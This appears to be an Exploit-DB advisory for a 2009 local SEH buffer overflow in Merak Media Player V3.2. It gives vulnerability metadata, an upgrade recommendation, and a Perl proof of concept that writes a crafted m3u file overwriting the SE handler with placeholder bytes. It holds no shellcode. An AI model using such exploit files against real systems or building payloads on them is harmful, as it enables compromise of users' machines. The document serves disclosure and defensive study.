Merak Media Player V3.2 m3u file Local Buffer overflow (SEH)

vendor:

Merak Media Player

by:

Houssamix

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Merak Media Player

Affected Version From: V3.2

Affected Version To: V3.2

Patch Exists: YES

Related CWE: N/A

CPE: a:merak_software:merak_media_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Merak Media Player V3.2 m3u file Local Buffer overflow (SEH)

Merak Media Player V3.2 is vulnerable to a local buffer overflow vulnerability when processing specially crafted m3u files. By supplying a specially crafted m3u file, an attacker can overwrite the SEH handler and gain control of the execution flow.

Mitigation:

Upgrade to the latest version of Merak Media Player.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w

# Author : Houssamix

# Merak Media Player V3.2  m3u file Local Buffer overflow (SEH) 
# Download :  http://www.qwerks.com/download/3748/merak.zip

# --------------------------------------------
# EAX 00000000
# ECX 45454545
# EDX 7C9137D8 ntdll.7C9137D8
# EBX 00000000
# ESP 0013F784
# EBP 0013F7A4
# ESI 00000000
# EDI 00000000
# EIP 45454545

# 0013FBE4   42424242  Pointer to next SEH record
# 0013FBE8   45454545  SE handler
# ---------------------------------------------

print "===================================================================== \n";
print "Author : Houssamix 						     \n";
print "===================================================================== \n";
print "Merak Media Player V3.2  m3u file Local Buffer overflow (SEH) 		 \n";
print "===================================================================== \n";

my $buf = "\x42" x 78;
my $seh = "\x45\x45\x45\x45";
my $buff = "\x43" x 1120;
my $file="hsmx.m3u";
$exploit = $buf.$seh.$buff;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-25]